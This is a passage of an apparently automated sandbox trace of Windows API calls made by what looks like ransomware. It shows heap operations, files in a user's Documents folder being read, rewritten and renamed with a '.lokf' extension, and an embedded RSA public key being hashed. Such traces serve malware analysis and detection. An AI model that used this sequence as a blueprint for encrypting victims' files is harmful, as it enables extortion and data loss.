Flags=0x0, Size=0x64) returned 0x735b80 [0058.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0058.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.797] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.797] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3292fe8 [0058.797] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x32619a0 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3282810 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.797] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b178 [0058.797] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0058.797] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b190 [0058.797] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0058.797] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b160 [0058.797] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0058.797] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0058.797] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.797] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0058.797] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b1a8 [0058.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0058.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0058.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0058.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0058.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0058.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0058.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b178 | out: hHeap=0x660000) returned 1 [0058.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b178 [0058.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0058.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0058.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0058.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3296fa8 [0058.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0058.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b178 | out: hHeap=0x660000) returned 1 [0058.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0058.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0058.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x32679f8 [0058.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0058.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3292fe8 | out: hHeap=0x660000) returned 1 [0058.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32679f8 | out: hHeap=0x660000) returned 1 [0058.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0058.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0058.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296fa8 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b1a8 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b190 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b160 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b148 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c829f8 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3282810 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32619a0 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0058.799] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c83710*, nNumberOfBytesToWrite=0x15702, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c83710*, lpNumberOfBytesWritten=0x9f4fb14*=0x15702, lpOverlapped=0x0) returned 1 [0058.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c83710 | out: hHeap=0x660000) returned 1 [0058.800] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15707, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.800] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bcd8 [0058.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0058.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0058.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0058.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bcd8 | out: hHeap=0x660000) returned 1 [0058.800] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0058.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.800] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.800] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.800] CloseHandle (hObject=0x5cc) returned 1 [0058.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0058.801] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0058.801] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0LcY86kifJlQ7.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0lcy86kifjlq7.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0LcY86kifJlQ7.xlsx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0lcy86kifjlq7.xlsx.lokf")) returned 1 [0058.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.802] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.803] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0058.803] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f32e340, ftCreationTime.dwHighDateTime=0x1d55107, ftLastAccessTime.dwLowDateTime=0x21972140, ftLastAccessTime.dwHighDateTime=0x1d55d7f, ftLastWriteTime.dwLowDateTime=0x21972140, ftLastWriteTime.dwHighDateTime=0x1d55d7f, nFileSizeHigh=0x0, nFileSizeLow=0xcaaf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="44yienfP0_mk.docx", cAlternateFileName="44YIEN~1.DOC")) returned 1 [0058.803] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bcd8 [0058.803] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adb18 [0058.803] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bcd8 | out: hHeap=0x660000) returned 1 [0058.803] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\44yienfP0_mk.docx") returned=".docx" [0058.803] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\44yienfP0_mk.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\44yienfp0_mk.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.803] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=51887) returned 1 [0058.803] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.806] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xca89, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.806] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.806] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.806] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.806] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xcaaf, lpOverlapped=0x0) returned 1 [0058.807] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.807] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.807] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.807] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.807] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.807] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.807] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.807] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.807] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.807] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.807] GetLastError () returned 0x0 [0058.808] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.808] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.808] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.808] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.808] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.808] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.808] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.808] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.808] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.808] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xcab0) returned 0x9c83710 [0058.808] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0058.808] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.808] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0058.808] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.808] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0058.808] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0058.808] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c829f8 [0058.808] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b148 [0058.808] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c82a40 [0058.808] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b160 [0058.808] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b190 [0058.808] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.808] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b1a8 [0058.808] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0058.808] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0058.809] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.809] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b190 | out: hHeap=0x660000) returned 1 [0058.809] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b1a8 | out: hHeap=0x660000) returned 1 [0058.809] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.809] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.809] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0058.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b1a8 [0058.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0058.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b190 [0058.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0058.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0058.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0058.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0058.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.809] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.809] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b1a8 | out: hHeap=0x660000) returned 1 [0058.809] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.809] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b190 | out: hHeap=0x660000) returned 1 [0058.809] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0058.809] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.809] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.809] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.809] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) 